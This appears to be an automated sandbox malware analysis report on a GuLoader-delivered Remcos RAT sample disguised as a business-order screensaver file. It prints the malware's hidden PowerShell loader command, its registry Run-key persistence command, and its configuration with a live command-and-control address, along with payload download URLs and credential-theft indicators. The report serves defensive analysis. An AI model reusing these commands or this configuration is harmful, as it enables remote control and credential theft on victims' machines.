Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Company Profile and new order-202401127.scr.exe

Overview

General Information

Sample name:Company Profile and new order-202401127.scr.exe
Analysis ID:1568022
MD5:935bdb714d2c6a118e9c6bfd941084b8
SHA1:817f3f195d61d459fbbdac24e5a4f014d927edcf
SHA256:c69b2064c89c254dbeda8f204b3a60ab753816ddff618be9d593cb9839cfe09d
Tags:exeGuLoaderscruser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Company Profile and new order-202401127.scr.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe" MD5: 935BDB714D2C6A118E9C6BFD941084B8)
    • powershell.exe (PID: 1856 cmdline: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1292 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • cmd.exe (PID: 1996 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 6520 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • msiexec.exe (PID: 528 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 5228 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • msiexec.exe (PID: 1440 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["185.29.10.213:63650:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NJ8CFR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.2617447888.000000000A528000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: msiexec.exe PID: 1292JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Click to see the 2 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", ParentImage: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, ParentProcessId: 2992, ParentProcessName: Company Profile and new order-202401127.scr.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", ProcessId: 1856, ProcessName: powershell.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Loaded
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1996, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", ProcessId: 6520, ProcessName: reg.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.13.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1292, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49807
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1292, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)", ProcessId: 1996, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", ParentImage: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, ParentProcessId: 2992, ParentProcessName: Company Profile and new order-202401127.scr.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)", ProcessId: 1856, ProcessName: powershell.exe

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 19 A8 76 ED 73 96 AF D9 EB E6 7A FC DD 5D 21 02 21 F9 0B 34 DC EA 73 F5 BA 62 D5 F0 1D 96 56 42 01 86 3D C4 20 90 FF 5C A5 83 9D DA F3 86 93 3F 35 BA 59 91 4F 0C 29 4C 88 64 D6 CD A7 B3 2A 89 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-NJ8CFR\exepath
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T06:37:15.606210+010020365941Malware Command and Control Activity Detected192.168.2.549825185.29.10.21363650TCP
            2024-12-04T06:37:20.590561+010020365941Malware Command and Control Activity Detected192.168.2.549840185.29.10.21363650TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T06:37:18.211477+010028033043Unknown Traffic192.168.2.549835178.237.33.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T06:37:09.081442+010028032702Potentially Bad Traffic192.168.2.549807104.21.13.139443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["185.29.10.213:63650:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NJ8CFR", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
            Source: Company Profile and new order-202401127.scr.exeVirustotal: Detection: 13%Perma Link
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
            Source: Company Profile and new order-202401127.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49813 version: TLS 1.2
            Source: Company Profile and new order-202401127.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2616173685.0000000008C0A000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_22F510F1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F56580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,6_2_22F56580
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\nonopposable\Jump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49825 -> 185.29.10.213:63650
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49840 -> 185.29.10.213:63650
            Source: Malware configuration extractorIPs: 185.29.10.213
            Source: global trafficTCP traffic: 192.168.2.5:49825 -> 185.29.10.213:63650
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 104.21.13.139 104.21.13.139
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: DATACLUB-SE DATACLUB-SE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49835 -> 178.237.33.50:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49807 -> 104.21.13.139:443
            Source: global trafficHTTP traffic detected: GET /data-package/a8AChfye/download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: filetransfer.ioCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /storage/download/Yo8ryWgWZnzn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: s25.filetransfer.ioConnection: Keep-AliveCookie: nette-samesite=1; PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /data-package/a8AChfye/download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: filetransfer.ioCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /storage/download/Yo8ryWgWZnzn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: s25.filetransfer.ioConnection: Keep-AliveCookie: nette-samesite=1; PHPSESSID=eh1ak3nehcfgevvr81o68k5dsg
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: msiexec.exe, 0000000A.00000002.2878738738.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2878129912.000000000349A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: msiexec.exe, 0000000A.00000002.2878738738.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2878129912.000000000349A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: msiexec.exe, 00000006.00000002.3320063164.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: msiexec.exe, 00000006.00000002.3320063164.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: filetransfer.io
            Source: global trafficDNS traffic detected: DNS query: s25.filetransfer.io
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhv7A62.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv7A62.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv7A62.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv7A62.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv7A62.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307649031.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2854804372.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2851800069.0000000006BF8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2859815808.0000000006BF8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2859447513.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2856857118.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2813327763.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2879060126.0000000006C07000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2878820778.0000000006C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp;
            Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpD
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
            Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpZ
